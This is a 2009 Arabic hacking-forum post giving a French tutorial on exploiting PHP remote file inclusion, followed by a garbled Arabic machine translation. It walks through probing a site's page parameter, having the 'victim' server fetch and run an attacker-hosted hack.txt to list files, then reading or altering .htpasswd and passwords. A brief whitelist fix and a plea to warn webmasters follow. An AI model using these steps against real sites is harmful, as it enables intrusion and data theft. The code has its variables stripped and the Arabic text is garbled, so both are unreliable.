heithem
i
Les failles PHP 613623


عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا Les failles PHP 829894
ادارة المنتدي Les failles PHP 103798
heithem
i
Les failles PHP 613623


عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا Les failles PHP 829894
ادارة المنتدي Les failles PHP 103798
heithem
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


L'imPossIbLE Se ReaLiSe
 
الرئيسيةأحدث الصورالتسجيلدخول
New Chris Brown

 

 Les failles PHP

اذهب الى الأسفل 
كاتب الموضوعرسالة
admin
Admin



عدد المساهمات : 137
تاريخ التسجيل : 02/05/2009
العمر : 34

Les failles PHP Empty
مُساهمةموضوع: Les failles PHP   Les failles PHP Emptyالأربعاء سبتمبر 16, 2009 1:12 am


Faille d'include

Si tu pouvais utiliser du PHP librement sur un site, tu pourrais le hacker et en faire ce que tu veux.
Et pour certains sites, c'est possible !
Si tu vois que l'adresse d'une page d'un site est du genre http://www.site.com/page.php?page=news.php par exemple (ou http://www.site.com/?url=news.php ...etc), ça signifie que la page index inclu la page news.php pour l'afficher. Certain webmasters ont oublié de protégé cet include, ce qui fait que tu peux inclure n'importe quelle page !

Pour en être sûr, essai ça : http://www.site.com/page.php?page=http://www.google.com (ne pas oublier le http://)
Si la page d'accueil de google s'affiche dans le site, c'est que tu as réussi !


Maintenant, tu peux modifier les fichiers, en créer, récupérer des mots de passe du site en question !

Pour afficher tous les noms de fichiers du site (très utile pour savoir où se trouve l'admin...etc), créé un fichier avec le code php sur ton compte (voir tutoriaux php) :


function scann(){
=opendir();
while(=readdir()){
if(is_dir("/") && !="." && !=".."){
scann("/");
}else{
echo "/
";
}
}
}
scann(".");


une fois ce script sur ton compte (http://www.toncompte.com/hack.txt), tu peux le faire exécuter par le serveur victime comme ceci :
http://www.site.com/page.php?page=http://www.toncompte.com/hack.txt
/!\ Ton fichier ne doit pas être en *.php, comme le disent la plupart des sites, sinon il sera exécuté sur ton serveur avant d'être affiché par le serveur victime, ce qui reviendrait à pirater ton site !
Et voilà ! Les noms de tous les fichiers du site www.site.com son affichés sur ton écran !


Maintenant que tu connais toutes les pages, les .htaccess et les .htpasswd, tu peux les voir, les effacer et les modifier de la même façon (voir les tutoriaux PHP).



Pour réparer la faille
Pour réparer la faille, il suffit de vérifier le nom de la page avant de l'include
Exemple de protection :


=Array("news.php","forum.php","livredor.php"); // Noms des pages autorisées à être incluses
// Si le nom de la page demandée fait partie de la liste des pages autorisées, on l'inclu :
if(in_array(,)) include ;



Alors si tu repères des failles de ce type, sois sympa et préviens le webmaster


إذا كنت تستطيع استخدام ftp في موقع ما ، هل يمكن أن الإختراق وأنها تفعل ما تريد.
وبالنسبة لبعض المواقع ، ويمكنك!

إذا كنت تعرف عنوان صفحة من هذا الموقع هو
الكود:
 http://www.site.com/page.php؟page=news.php
على سبيل المثال (أو

الكود:
 http://www.site.com /؟ رابط = news.php...
الخ) ، فإن ذلك يعني أن مؤشر
صفحة تضمنت الصفحة news.php لعرضها. بعض المواقع قد نسيت أن تشمل هذه
الحماية ، بحيث يمكنك تضمين أي صفحة!

ومن المؤكد أن هذه محاولة :
الكود:
 http://www.site.com/page.php؟page=http://www.google.com
(لا ننسى http://)



الآن يمكنك تحرير الملفات ، وخلق واسترجاع كلمات السر من موقع في السؤال!

لعرض كافة أسماء الملفات من موقع (مفيدة جدا لمعرفة أين المشرف... الخ) ، وإنشاء ملف مع رمز [php] على حسابك (انظر الدروس [php]) :
إذا كانت الصفحة الرئيسية لجوجل ليعرض الموقع ان كنت قد نجحت!
function scann(){
=opendir();
while(=readdir()){
if(is_dir("/") && !="." && !=".."){
scann("/");
}else{
echo "/
";
}
}
}
scann(".");



الكود:
http://www.site.com/page.php؟page=http://www.toncompte.com/hack.txt
/ "\ الملف الخاص بك لا ينبغي أن يكون في [php] *. قوله ان معظم المواقع ،
وإلا فإنه سوف تعمل على الخادم الخاص بك قبل أن يتم عرضها من قبل خادم
الضحية ، والتي ستكون الإختراق موقعك!
وفويلا! أسماء جميع الملفات موقع www.site.com وعرض على الشاشة!


الآن بعد أن تعرف جميع الصفحات. هتكس و. الجدران النارية ، يمكنك ان ترى لهم ، وحذف وتعديل بالطريقة نفسها (انظر الدروس [php]).




لإصلاح الخطأ ، ومجرد التحقق من اسم الصفحة قبل أن تشمل
مثال للحماية :


= صفيف ( "news.php" ، "forum.php" ، "livredor.php") / / أسماء صفحات سمح لإدراجها
/ / إذا كان اسم الصفحة المطلوبة هي جزء من قائمة الصفحات المسموح بها ، وشملت :
إذا كان (in_array (،)) وتشمل ؛



حتى إذا كنت اكتشاف نقاط الضعف من هذا النوع ، يكون لطيفا ويحذر المسؤول عن الموقع
مرة واحدة هذا السيناريو على حسابك (http://www.toncompte.com/hack.txt) ، يمكنك فرض عليه من قبل ملقم ضحية مثل هذا : لاصلاح الخلل

الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://heithem.own0.com
 
Les failles PHP
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
heithem :: [ منتدى عــــالم الهكر ] :: حماية المواقع-
انتقل الى: